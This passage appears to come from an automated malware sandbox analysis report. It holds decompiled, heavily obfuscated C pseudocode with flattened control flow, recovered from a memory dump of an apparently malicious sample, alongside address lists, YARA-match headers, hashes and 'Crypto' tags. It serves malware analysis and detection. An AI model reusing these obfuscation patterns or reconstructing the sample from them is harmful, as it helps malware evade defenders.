				_v1108 = _v1108 ^ 0x21f6cf78;
				_v1068 = 0xb1871f;
				_v1068 = _v1068 | 0x2d1b9d36;
				_v1068 = _v1068 ^ 0x2db0c7b1;
				_v1052 = 0x4ec5bc;
				_v1052 = _v1052 + 0x7f92;
				_v1052 = _v1052 ^ 0x0040cfb8;
				_v1148 = 0xaf3f79;
				_v1148 = _v1148 << 0xf;
				_v1148 = _v1148 + 0xffffd8d9;
				_v1148 = _v1148 + 0x7b5b;
				_v1148 = _v1148 ^ 0x9fb9a37f;
				_v1116 = 0xe95276;
				_v1116 = _v1116 + 0xd080;
				_v1116 = _v1116 * 0x50;
				_v1116 = _v1116 ^ 0x492e6145;
				_v1124 = 0x862a30;
				_v1124 = _v1124 | 0x5dbcc624;
				_v1124 = _v1124 + 0xed19;
				_v1124 = _v1124 ^ 0x5db03a19;
				_v1084 = 0x2c0a28;
				_v1084 = _v1084 * 0x1a;
				_v1084 = _v1084 * 7;
				_v1084 = _v1084 ^ 0x1f493afd;
				_v1064 = 0xaaa7e2;
				_v1064 = _v1064 + 0xffff0f89;
				_v1064 = _v1064 ^ 0x00a294dc;
				_v1120 = 0x632f45;
				_t294 = 0x52;
				_v1120 = _v1120 * 0x72;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 ^ 0x6152e548;
				_v1136 = 0xedff35;
				_v1136 = _v1136 ^ 0xd8e369fe;
				_v1136 = _v1136 + 0xffffa94a;
				_v1136 = _v1136 + 0x84ff;
				_v1136 = _v1136 ^ 0xd8047fe1;
				_v1152 = 0x224056;
				_v1152 = _v1152 << 7;
				_v1152 = _v1152 * 0x7f;
				_v1152 = _v1152 << 0xa;
				_v1152 = _v1152 ^ 0xd55c63cf;
				_v1048 = 0x53c998;
				_v1048 = _v1048 | 0x852243cb;
				_v1048 = _v1048 ^ 0x85793c7e;
				_v1104 = 0xb4b0a8;
				_v1104 = _v1104 + 0x7646;
				_v1104 = _v1104 ^ 0x00b0d585;
				_v1076 = 0x89172f;
				_v1076 = _v1076 ^ 0x087c2659;
				_v1076 = _v1076 + 0xffff86e0;
				_v1076 = _v1076 ^ 0x08f30a69;
				_v1112 = 0xe122a0;
				_v1112 = _v1112 * 0x26;
				_v1112 = _v1112 * 0x67;
				_v1112 = _v1112 ^ 0x721af173;
				_v1144 = 0xa059a2;
				_v1144 = _v1144 << 1;
				_v1144 = _v1144 + 0xffffebb7;
				_v1144 = _v1144 / _t294;
				_v1144 = _v1144 ^ 0x0002b34c;
				_v1088 = 0xbb0571;
				_t295 = 0x4d;
				_v1088 = _v1088 * 0x49;
				_v1088 = _v1088 / _t295;
				_v1088 = _v1088 ^ 0x00bdf199;
				_v1044 = 0x8a3abf;
				_v1044 = _v1044 << 0xd;
				_v1044 = _v1044 ^ 0x4757da71;
				_v1056 = 0x8c4fd5;
				_v1056 = _v1056 >> 5;
				_v1056 = _v1056 ^ 0x0009ecbd;
				_v1132 = 0x995135;
				_v1132 = _v1132 | 0x5c2c20ca;
				_v1132 = _v1132 + 0xffff0092;
				_v1132 = _v1132 << 5;
				_v1132 = _v1132 ^ 0x978e8efb;
				_v1140 = 0x66804f;
				_v1140 = _v1140 << 0xa;
				_v1140 = _v1140 >> 0xb;
				_v1140 = _v1140 ^ 0x06a45735;
				_v1140 = _v1140 ^ 0x06b64b82;
				L001E2F8B();
				do {
					while(_t331 != 0x13a9155) {
						if(_t331 == 0x62cfa7d) {
							_push(_v1096);
							_push(_v1156);
							_t281 = E001DCD35(0x1c1000, _v1128, __eflags);
							_pop(_t301);
							E001D2EA5( *0x1e5218 + 0x234, __eflags,  *0x1e5218 + 0x18, _t301, _v1100, _v1060, _t281, _v1108, _v1068,  &_v1040);
							_t285 = E001D629F(_v1052, _t281, _v1148, _v1116, _v1124);
							_t335 =  &(_t335[0xb]);
							_t331 = 0x78ce451;
							continue;
						} else {
							if(_t331 == 0x6e7fa89) {
								_t331 = 0x62cfa7d;
								continue;
							} else {
								_t340 = _t331 - 0x78ce451;
								if(_t331 == 0x78ce451) {
									_push(_v1120);
									_push(_v1064);
									_t286 = E001DCD35(0x1c1050, _v1084, _t340);
									E001DDD54(_t340,  &_v520, _v1104, _t286, E001DED56(_v1136),  *0x1e5218 + 0x234, _v1076,  *0x1e5218 + 0x18, _v1112);
									_t285 = E001D629F(_v1144, _t286, _v1088, _v1044, _v1056);
									_t335 =  &(_t335[0xd]);
									_t331 = 0x13a9155;
									continue;
								}
							}
						}
						goto L9;
					}
					_push(_v1140);
					_push( &_v1040);
					E001D9124(_v1132,  &_v520, __eflags);
					_t331 = 0x2227053;
					L9:
					__eflags = _t331 - 0x2227053;
				} while (__eflags != 0);
				return _t285;
			}













































                          0x001c19c0
                          0x001c19c6
                          0x001c19d0
                          0x001c19d8
                          0x001c19e0
                          0x001c19f2
                          0x001c19f7
                          0x001c1a01
                          0x001c1a06
                          0x001c1a0b
                          0x001c1a11
                          0x001c1a19
                          0x001c1a21
                          0x001c1a2d
                          0x001c1a30
                          0x001c1a34
                          0x001c1a3c
                          0x001c1a49
                          0x001c1a4d
                          0x001c1a55
                          0x001c1a5a
                          0x001c1a62
                          0x001c1a6a
                          0x001c1a6f
                          0x001c1a77
                          0x001c1a7f
                          0x001c1a87
                          0x001c1a8f
                          0x001c1a97
                          0x001c1a9f
                          0x001c1aa7
                          0x001c1aaf
                          0x001c1ab4
                          0x001c1abc
                          0x001c1ac4
                          0x001c1acc
                          0x001c1ad4
                          0x001c1ae1
                          0x001c1ae5
                          0x001c1aed
                          0x001c1af5
                          0x001c1afd
                          0x001c1b05
                          0x001c1b0d
                          0x001c1b15
                          0x001c1b1d
                          0x001c1b25
                          0x001c1b2d
                          0x001c1b32
                          0x001c1b3a
                          0x001c1b42
                          0x001c1b4a
                          0x001c1b52
                          0x001c1b5f
                          0x001c1b63
                          0x001c1b6b
                          0x001c1b73
                          0x001c1b7b
                          0x001c1b83
                          0x001c1b8b
                          0x001c1b98
                          0x001c1ba1
                          0x001c1ba7
                          0x001c1baf
                          0x001c1bb7
                          0x001c1bbf
                          0x001c1bc7
                          0x001c1bd6
                          0x001c1bd9
                          0x001c1bdd
                          0x001c1be2
                          0x001c1bea
                          0x001c1bf2
                          0x001c1bfa
                          0x001c1c02
                          0x001c1c0a
                          0x001c1c12
                          0x001c1c1a
                          0x001c1c24
                          0x001c1c28
                          0x001c1c2d
                          0x001c1c35
                          0x001c1c40
                          0x001c1c4b
                          0x001c1c56
                          0x001c1c66
                          0x001c1c6e
                          0x001c1c76
                          0x001c1c7e
                          0x001c1c86
                          0x001c1c8e
                          0x001c1c96
                          0x001c1ca3
                          0x001c1cac
                          0x001c1cb0
                          0x001c1cb8
                          0x001c1cc0
                          0x001c1cc4
                          0x001c1cd4
                          0x001c1cd8
                          0x001c1ce0
                          0x001c1ced
                          0x001c1cee
                          0x001c1cf8
                          0x001c1cfc
                          0x001c1d04
                          0x001c1d0f
                          0x001c1d17
                          0x001c1d22
                          0x001c1d2a
                          0x001c1d2f
                          0x001c1d37
                          0x001c1d3f
                          0x001c1d47
                          0x001c1d4f
                          0x001c1d54
                          0x001c1d5c
                          0x001c1d64
                          0x001c1d69
                          0x001c1d6e
                          0x001c1d76
                          0x001c1d86
                          0x001c1d9a
                          0x001c1d9a
                          0x001c1da8
                          0x001c1e54
                          0x001c1e5d
                          0x001c1e65
                          0x001c1e6b
                          0x001c1e9f
                          0x001c1eb9
                          0x001c1ebe
                          0x001c1ec1
                          0x00000000
                          0x001c1dae
                          0x001c1db4
                          0x001c1e4d
                          0x00000000
                          0x001c1dba
                          0x001c1dba
                          0x001c1dbc
                          0x001c1dc2
                          0x001c1dcb
                          0x001c1dd3
                          0x001c1e1b
                          0x001c1e3b
                          0x001c1e40
                          0x001c1e43
                          0x00000000
                          0x001c1e43
                          0x001c1dbc
                          0x001c1db4
                          0x00000000
                          0x001c1da8
                          0x001c1ec8
                          0x001c1ed7
                          0x001c1edf
                          0x001c1ee6
                          0x001c1ee8
                          0x001c1ee8
                          0x001c1ee8
                          0x001c1efa

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (,$E/c$Fv$HRa$V@"$}95
                          • API String ID: 0-2341880589
                          • Opcode ID: 1d5696a5ed632520482e43399bd0707e6423415c5c10d46f15989a39d4b77cdc
                          • Instruction ID: d8f5a53753e388c04fd3ff3126206032436748e436c9d022781a911d6900e1be
                          • Opcode Fuzzy Hash: 1d5696a5ed632520482e43399bd0707e6423415c5c10d46f15989a39d4b77cdc
                          • Instruction Fuzzy Hash: C1D101724083819FC368CF64C48AA0BFBF2FBD5398F104A1DF69696260D7B59949CB46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C92C1, Relevance: 7.7, Strings: 6, Instructions: 227COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 95%
                          			E001C92C1() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				void* _t238;
				void* _t247;
				void* _t253;
				void* _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int* _t301;

				_t301 =  &_v1120;
				_v1064 = 0x518e17;
				_v1064 = _v1064 >> 5;
				_t247 = 0xfe82576;
				_v1064 = _v1064 + 0xffff3a42;
				_v1064 = _v1064 ^ 0x00091886;
				_v1072 = 0x5ffe87;
				_v1072 = _v1072 | 0xff757ff6;
				_v1072 = _v1072 ^ 0xff797d4f;
				_v1104 = 0xf40f5c;
				_t289 = 0x74;
				_v1104 = _v1104 / _t289;
				_v1104 = _v1104 + 0xffffa24c;
				_t288 = 0;
				_v1104 = _v1104 + 0xffffa4df;
				_v1104 = _v1104 ^ 0x00015c23;
				_v1080 = 0x353c56;
				_t290 = 0x53;
				_v1080 = _v1080 / _t290;
				_v1080 = _v1080 + 0xffff91e6;
				_v1080 = _v1080 ^ 0x0006ede9;
				_v1060 = 0xdab2d6;
				_v1060 = _v1060 | 0x2ba98b4c;
				_v1060 = _v1060 ^ 0x2bfc5ebc;
				_v1100 = 0xa97148;
				_v1100 = _v1100 + 0xffff10c1;
				_v1100 = _v1100 | 0xcccd28f5;
				_t291 = 0xa;
				_v1100 = _v1100 / _t291;
				_v1100 = _v1100 ^ 0x147e298f;
				_v1116 = 0x32183d;
				_v1116 = _v1116 + 0xffff5d9e;
				_v1116 = _v1116 + 0x393a;
				_v1116 = _v1116 + 0x6fd9;
				_v1116 = _v1116 ^ 0x003751c4;
				_v1056 = 0xe60934;
				_t65 =  &_v1056; // 0xe60934
				_t292 = 0x63;
				_v1056 =  *_t65 / _t292;
				_v1056 = _v1056 ^ 0x000b4c23;
				_v1092 = 0x4f8c2b;
				_t293 = 0x25;
				_v1092 = _v1092 * 0x68;
				_v1092 = _v1092 + 0xa422;
				_v1092 = _v1092 * 0x39;
				_v1092 = _v1092 ^ 0x322fde2d;
				_v1048 = 0x3686c2;
				_v1048 = _v1048 + 0xdee8;
				_v1048 = _v1048 ^ 0x0036f3ee;
				_v1108 = 0xc4b6cd;
				_v1108 = _v1108 / _t293;
				_v1108 = _v1108 + 0x42f6;
				_v1108 = _v1108 + 0xffff72e8;
				_v1108 = _v1108 ^ 0x000a51ca;
				_v1044 = 0x14dca0;
				_t294 = 0xb;
				_v1044 = _v1044 / _t294;
				_v1044 = _v1044 ^ 0x00096e7d;
				_v1112 = 0x4f0e8;
				_v1112 = _v1112 + 0xffff8e5b;
				_v1112 = _v1112 << 0xc;
				_v1112 = _v1112 ^ 0xf999ab7b;
				_v1112 = _v1112 ^ 0xbe6a739c;
				_v1052 = 0x4c4d6a;
				_v1052 = _v1052 + 0xffff9d04;
				_v1052 = _v1052 ^ 0x004d68c9;
				_v1120 = 0xf5c85b;
				_v1120 = _v1120 << 0xc;
				_t295 = 0x5e;
				_v1120 = _v1120 / _t295;
				_v1120 = _v1120 | 0x1f7d0baf;
				_v1120 = _v1120 ^ 0x1ff3417c;
				_v1068 = 0x3dcd4a;
				_v1068 = _v1068 >> 5;
				_t296 = 0x24;
				_v1068 = _v1068 / _t296;
				_v1068 = _v1068 ^ 0x000ba0b2;
				_v1084 = 0x1e3fce;
				_v1084 = _v1084 + 0xffffbb5b;
				_t297 = 0x16;
				_v1084 = _v1084 / _t297;
				_v1084 = _v1084 ^ 0x00043461;
				_v1076 = 0xd55812;
				_v1076 = _v1076 + 0x80f2;
				_v1076 = _v1076 + 0xffff0f65;
				_v1076 = _v1076 ^ 0x00d50e7f;
				_v1088 = 0x61c2c6;
				_v1088 = _v1088 + 0xffffc5ff;
				_v1088 = _v1088 | 0x0e0f1766;
				_v1088 = _v1088 + 0xffff14c8;
				_v1088 = _v1088 ^ 0x0e6b43a2;
				_v1096 = 0x764478;
				_v1096 = _v1096 + 0xffff2435;
				_t298 = 0x55;
				_v1096 = _v1096 / _t298;
				_v1096 = _v1096 + 0xffff44bd;
				_v1096 = _v1096 ^ 0x0007ba65;
				do {
					while(_t247 != 0x15230fa) {
						if(_t247 == 0xad96eeb) {
							E001D855C( &_v520, _v1064, __eflags, _v1072, _v1104, _t247, _v1080);
							_t301 =  &(_t301[4]);
							_t247 = 0xbd6821c;
							continue;
						} else {
							if(_t247 == 0xbd6821c) {
								_push(_v1116);
								_push(_v1100);
								_t238 = E001DCD35(0x1c1000, _v1060, __eflags);
								_pop(_t253);
								E001D2EA5( *0x1e5218 + 0x234, __eflags,  *0x1e5218 + 0x18, _t253, _v1092, _v1048, _t238, _v1108, _v1044,  &_v1040);
								E001D629F(_v1112, _t238, _v1052, _v1120, _v1068);
								_t301 =  &(_t301[0xb]);
								_t247 = 0xcfa61c2;
								continue;
							} else {
								if(_t247 == 0xcfa61c2) {
									_push(_v1076);
									_push( &_v520);
									__eflags = E001D9124(_v1084,  &_v1040, __eflags);
									_t288 =  !=  ? 1 : _t288;
									_t247 = 0x15230fa;
									continue;
								} else {
									if(_t247 == 0xfe82576) {
										_t247 = 0xad96eeb;
										continue;
									}
								}
							}
						}
						goto L11;
					}
					E001DDB87(_v1088, _v1096,  &_v1040);
					_t247 = 0xfc68290;
					L11:
					__eflags = _t247 - 0xfc68290;
				} while (__eflags != 0);
				return _t288;
			}








































                          0x001c92c1
                          0x001c92c7
                          0x001c92d1
                          0x001c92d6
                          0x001c92db
                          0x001c92e3
                          0x001c92eb
                          0x001c92f3
                          0x001c92fb
                          0x001c9303
                          0x001c9315
                          0x001c931a
                          0x001c9320
                          0x001c9328
                          0x001c932a
                          0x001c9332
                          0x001c933a
                          0x001c9346
                          0x001c934b
                          0x001c9351
                          0x001c9359
                          0x001c9361
                          0x001c9369
                          0x001c9371
                          0x001c9379
                          0x001c9381
                          0x001c9389
                          0x001c9395
                          0x001c939a
                          0x001c93a0
                          0x001c93a8
                          0x001c93b0
                          0x001c93b8
                          0x001c93c0
                          0x001c93c8
                          0x001c93d0
                          0x001c93d8
                          0x001c93dc
                          0x001c93e1
                          0x001c93e7
                          0x001c93ef
                          0x001c93fc
                          0x001c93fd
                          0x001c9401
                          0x001c940e
                          0x001c9412
                          0x001c941a
                          0x001c9422
                          0x001c942a
                          0x001c9432
                          0x001c9440
                          0x001c9444
                          0x001c944c
                          0x001c9454
                          0x001c945e
                          0x001c946c
                          0x001c9471
                          0x001c9477
                          0x001c9484
                          0x001c9491
                          0x001c9499
                          0x001c949e
                          0x001c94a6
                          0x001c94ae
                          0x001c94b6
                          0x001c94be
                          0x001c94c6
                          0x001c94ce
                          0x001c94d7
                          0x001c94dc
                          0x001c94e2
                          0x001c94ea
                          0x001c94f2
                          0x001c94fa
                          0x001c9503
                          0x001c9508
                          0x001c950e
                          0x001c9516
                          0x001c951e
                          0x001c952a
                          0x001c952f
                          0x001c9535
                          0x001c953d
                          0x001c9545
                          0x001c954d
                          0x001c9555
                          0x001c955d
                          0x001c9565
                          0x001c956d
                          0x001c9575
                          0x001c957d
                          0x001c9585
                          0x001c958d
                          0x001c9599
                          0x001c959c
                          0x001c95a0
                          0x001c95a8
                          0x001c95b0
                          0x001c95b0
                          0x001c95be
                          0x001c9690
                          0x001c9695
                          0x001c9698
                          0x00000000
                          0x001c95c4
                          0x001c95c6
                          0x001c960a
                          0x001c9613
                          0x001c961b
                          0x001c9621
                          0x001c964f
                          0x001c9666
                          0x001c966b
                          0x001c966e
                          0x00000000
                          0x001c95c8
                          0x001c95ce
                          0x001c95e0
                          0x001c95ef
                          0x001c95fe
                          0x001c9600
                          0x001c9603
                          0x00000000
                          0x001c95d0
                          0x001c95d6
                          0x001c95dc
                          0x00000000
                          0x001c95dc
                          0x001c95d6
                          0x001c95ce
                          0x001c95c6
                          0x00000000
                          0x001c95be
                          0x001c96ac
                          0x001c96b2
                          0x001c96b7
                          0x001c96b7
                          0x001c96b7
                          0x001c96cf

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 4$:9$V<5$jML$xDv$}n
                          • API String ID: 0-3443733993
                          • Opcode ID: bd740bf9255ead4b0940177b9e0bd8983ba244b273c7a52e0d05eaf3743850ef
                          • Instruction ID: a3320d04a138934c97fadc0c25066eb86fe02fe9bfa4938513a21a4743798b7d
                          • Opcode Fuzzy Hash: bd740bf9255ead4b0940177b9e0bd8983ba244b273c7a52e0d05eaf3743850ef
                          • Instruction Fuzzy Hash: DAA166715083419FC358CF26D88984BBFE2FBD4768F508A1DF2954A260D7B5C94ACF86
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CB191, Relevance: 7.6, Strings: 6, Instructions: 121COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 89%
                          			E001CB191(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				void* _t87;
				intOrPtr _t102;
				signed int _t103;
				void* _t106;
				void* _t115;
				intOrPtr _t116;
				void* _t118;
				void* _t119;

				_push(_a12);
				_t115 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C358A(_t87);
				_v16 = 0x72b2bc;
				_t116 = 0;
				_v12 = 0x705e77;
				_t119 = _t118 + 0x14;
				_v8 = 0xd14ec7;
				_v4 = 0;
				_t106 = 0xfb323eb;
				_v20 = 0xe3d97e;
				_v20 = _v20 + 0xa7af;
				_v20 = _v20 ^ 0x00ee512d;
				_v24 = 0x168632;
				_v24 = _v24 + 0xe123;
				_v24 = _v24 ^ 0x0013eb0e;
				_v52 = 0x2e6341;
				_v52 = _v52 + 0x6d01;
				_v52 = _v52 ^ 0x28be2519;
				_v52 = _v52 >> 6;
				_v52 = _v52 ^ 0x00a7ba25;
				_v28 = 0xa881c2;
				_t103 = 0x39;
				_v28 = _v28 / _t103;
				_v28 = _v28 ^ 0x0004b18f;
				_v36 = 0x75efe3;
				_v36 = _v36 + 0xffff14c9;
				_v36 = _v36 * 0x52;
				_v36 = _v36 ^ 0x257d5f4a;
				_v44 = 0xecaef1;
				_v44 = _v44 | 0xcde27ad1;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x0cdc2a09;
				_v48 = 0x721bd8;
				_v48 = _v48 + 0x9e1e;
				_v48 = _v48 ^ 0xc9ddf5a6;
				_v48 = _v48 + 0x9d39;
				_v48 = _v48 ^ 0xc9a9f81f;
				_v40 = 0x4c90da;
				_v40 = _v40 ^ 0xc1c5c1e6;
				_v40 = _v40 + 0x4b08;
				_v40 = _v40 << 0xf;
				_v40 = _v40 ^ 0xce2bca86;
				_v32 = 0x49392c;
				_v32 = _v32 | 0xf96d8842;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x03e22426;
				do {
					while(_t106 != 0x14f632d) {
						if(_t106 == 0x35d454c) {
							_t116 = E001D94A1(_v36, _t115, _a12, _v44, _v48);
							_t119 = _t119 + 0xc;
							if(_t116 == 0) {
								_t106 = 0x14f632d;
								continue;
							}
						} else {
							if(_t106 == 0x56d459c) {
								E001CAE43( *0x1e5208, _v40, _v32);
							} else {
								if(_t106 == 0x61a974e) {
									if(E001C800A() != 0) {
										_t106 = 0x35d454c;
										continue;
									}
								} else {
									if(_t106 != 0xfb323eb) {
										goto L12;
									} else {
										_push(_t106);
										_push(_t106);
										_t102 = E001D5212(0x34);
										_t119 = _t119 + 0xc;
										 *0x1e5208 = _t102;
										_t106 = 0x61a974e;
										continue;
									}
								}
							}
						}
						L15:
						return _t116;
					}
					E001C7D63();
					_t106 = 0x56d459c;
					L12:
				} while (_t106 != 0x6f91342);
				goto L15;
			}
























                          0x001cb198
                          0x001cb19c
                          0x001cb19e
                          0x001cb1a2
                          0x001cb1a6
                          0x001cb1a7
                          0x001cb1a8
                          0x001cb1ad
                          0x001cb1b5
                          0x001cb1b7
                          0x001cb1bf
                          0x001cb1c2
                          0x001cb1cc
                          0x001cb1d0
                          0x001cb1d5
                          0x001cb1e2
                          0x001cb1ea
                          0x001cb1f2
                          0x001cb1fa
                          0x001cb202
                          0x001cb20a
                          0x001cb212
                          0x001cb21a
                          0x001cb222
                          0x001cb227
                          0x001cb22f
                          0x001cb23d
                          0x001cb245
                          0x001cb249
                          0x001cb251
                          0x001cb259
                          0x001cb266
                          0x001cb26a
                          0x001cb272
                          0x001cb282
                          0x001cb28a
                          0x001cb28f
                          0x001cb297
                          0x001cb29f
                          0x001cb2a7
                          0x001cb2af
                          0x001cb2b7
                          0x001cb2bf
                          0x001cb2c7
                          0x001cb2cf
                          0x001cb2d7
                          0x001cb2dc
                          0x001cb2e4
                          0x001cb2ec
                          0x001cb2f4
                          0x001cb2f9
                          0x001cb301
                          0x001cb301
                          0x001cb307
                          0x001cb371
                          0x001cb373
                          0x001cb378
                          0x001cb37a
                          0x00000000
                          0x001cb37a
                          0x001cb309
                          0x001cb30f
                          0x001cb3a4
                          0x001cb315
                          0x001cb31b
                          0x001cb354
                          0x001cb356
                          0x00000000
                          0x001cb356
                          0x001cb31d
                          0x001cb323
                          0x00000000
                          0x001cb325
                          0x001cb335
                          0x001cb336
                          0x001cb339
                          0x001cb33e
                          0x001cb341
                          0x001cb346
                          0x00000000
                          0x001cb346
                          0x001cb323
                          0x001cb31b
                          0x001cb30f
                          0x001cb3ab
                          0x001cb3b3
                          0x001cb3b3
                          0x001cb37e
                          0x001cb383
                          0x001cb388
                          0x001cb388
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #$,9I$-Q$Ac.$J_}%$w^p
                          • API String ID: 0-1558224833
                          • Opcode ID: e2df314c6a05dca094a75bf8f16fa804cab991284f93eac213794e042c7eb7d0
                          • Instruction ID: b70e32569c8aea3c60c75c58f007a2edb5a83aa7124bfd27f72804b1e4153fa3
                          • Opcode Fuzzy Hash: e2df314c6a05dca094a75bf8f16fa804cab991284f93eac213794e042c7eb7d0
                          • Instruction Fuzzy Hash: 345154B150D3418FC758CF61D98A91FBAE1FBE8718F005A1DF58696220D7B5CA098F87
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D009A, Relevance: 6.6, Strings: 5, Instructions: 367COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 99%
                          			E001D009A() {
				void* _t370;
				signed int _t373;
				signed int _t374;
				signed int _t376;
				signed int _t377;
				signed int _t382;
				signed int _t386;
				void* _t396;
				signed int _t438;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t454;
				void* _t458;

				 *(_t458 + 0x14) = 0x3127b6;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) + 0x501f;
				_t396 = 0xc84d6e5;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) >> 3;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) ^ 0xab1f0be8;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) ^ 0xab192513;
				 *(_t458 + 0x84) = 0xead28e;
				 *(_t458 + 0x84) =  *(_t458 + 0x84) << 8;
				 *(_t458 + 0x84) =  *(_t458 + 0x84) ^ 0xead28e01;
				 *(_t458 + 0x58) = 0xa603c7;
				 *(_t458 + 0x58) =  *(_t458 + 0x58) << 4;
				 *(_t458 + 0x58) =  *(_t458 + 0x58) ^ 0x0a603c73;
				 *(_t458 + 0x20) = 0xd43d7;
				_t441 = 0x19;
				 *(_t458 + 0x34) =  *(_t458 + 0x20) / _t441;
				_t442 = 0x7f;
				 *(_t458 + 0xa0) =  *(_t458 + 0xa0) & 0x00000000;
				 *(_t458 + 0x34) =  *(_t458 + 0x34) * 0x62;
				 *(_t458 + 0x34) =  *(_t458 + 0x34) + 0x15ce;
				 *(_t458 + 0x34) =  *(_t458 + 0x34) ^ 0x0035fdbc;
				 *(_t458 + 0x24) = 0xcee8b3;
				 *(_t458 + 0x24) =  *(_t458 + 0x24) * 0x1f;
				 *(_t458 + 0x24) =  *(_t458 + 0x24) + 0xffffb410;
				 *(_t458 + 0x24) =  *(_t458 + 0x24) + 0xffff3666;
				 *(_t458 + 0x24) =  *(_t458 + 0x24) ^ 0x190b3840;
				 *(_t458 + 0x58) = 0xf0b132;
				 *(_t458 + 0x58) =  *(_t458 + 0x58) << 0xa;
				 *(_t458 + 0x58) =  *(_t458 + 0x58) << 0xb;
				 *(_t458 + 0x58) =  *(_t458 + 0x58) ^ 0x264f52b7;
				 *(_t458 + 0x80) = 0xeefa29;
				 *(_t458 + 0x80) =  *(_t458 + 0x80) >> 6;
				 *(_t458 + 0x80) =  *(_t458 + 0x80) ^ 0x000c8dda;
				 *(_t458 + 0x14) = 0x6e7891;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) << 1;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) | 0x206ddb98;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) + 0xf540;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) ^ 0x20fb2a0e;
				 *(_t458 + 0xa0) = 0x7b1987;
				 *(_t458 + 0xa0) =  *(_t458 + 0xa0) + 0xffff8270;
				 *(_t458 + 0xa0) =  *(_t458 + 0xa0) ^ 0x007957fd;
				 *(_t458 + 0x48) = 0x5a70f5;
				 *(_t458 + 0x48) =  *(_t458 + 0x48) ^ 0x745daa51;
				 *(_t458 + 0x48) =  *(_t458 + 0x48) << 8;
				 *(_t458 + 0x48) =  *(_t458 + 0x48) ^ 0x07d09786;
				 *(_t458 + 0x3c) = 0x5eb3d0;
				 *(_t458 + 0x3c) =  *(_t458 + 0x3c) * 0x19;
				 *(_t458 + 0x3c) =  *(_t458 + 0x3c) | 0x9bc2572d;
				 *(_t458 + 0x3c) =  *(_t458 + 0x3c) << 4;
				 *(_t458 + 0x3c) =  *(_t458 + 0x3c) ^ 0xbffb3dbe;
				 *(_t458 + 0x60) = 0x3bfa6d;
				 *(_t458 + 0x60) =  *(_t458 + 0x60) * 0x4e;
				 *(_t458 + 0x60) =  *(_t458 + 0x60) / _t442;
				 *(_t458 + 0x60) =  *(_t458 + 0x60) ^ 0x002ef700;
				 *(_t458 + 0x78) = 0xa849f2;
				 *(_t458 + 0x78) =  *(_t458 + 0x78) + 0xffff7113;
				 *(_t458 + 0x78) =  *(_t458 + 0x78) ^ 0x00a83a7d;
				 *(_t458 + 0x90) = 0xc53e7;
				 *(_t458 + 0x90) =  *(_t458 + 0x90) + 0x57b6;
				 *(_t458 + 0x90) =  *(_t458 + 0x90) ^ 0x00029b15;
				 *(_t458 + 0x1c) = 0xd8bfcd;
				 *(_t458 + 0x1c) =  *(_t458 + 0x1c) + 0xa3cf;
				 *(_t458 + 0x1c) =  *(_t458 + 0x1c) + 0xffffa95b;
				_t443 = 0x7b;
				 *(_t458 + 0x1c) =  *(_t458 + 0x1c) / _t443;
				 *(_t458 + 0x1c) =  *(_t458 + 0x1c) ^ 0x000583c4;
				 *(_t458 + 0x9c) = 0x9fee94;
				 *(_t458 + 0x9c) =  *(_t458 + 0x9c) << 8;
				 *(_t458 + 0x9c) =  *(_t458 + 0x9c) ^ 0x9fe43700;
				 *(_t458 + 0x4c) = 0xeb8083;
				 *(_t458 + 0x4c) =  *(_t458 + 0x4c) << 0xc;
				 *(_t458 + 0x4c) =  *(_t458 + 0x4c) + 0x14bb;
				 *(_t458 + 0x4c) =  *(_t458 + 0x4c) ^ 0xb8043e5d;
				 *(_t458 + 0x50) = 0x1c25e4;
				_t444 = 0x39;
				 *(_t458 + 0x50) =  *(_t458 + 0x50) / _t444;
				 *(_t458 + 0x50) =  *(_t458 + 0x50) + 0xd0f9;
				 *(_t458 + 0x50) =  *(_t458 + 0x50) ^ 0x000e2e83;
				 *(_t458 + 0x2c) = 0x4dc3c6;
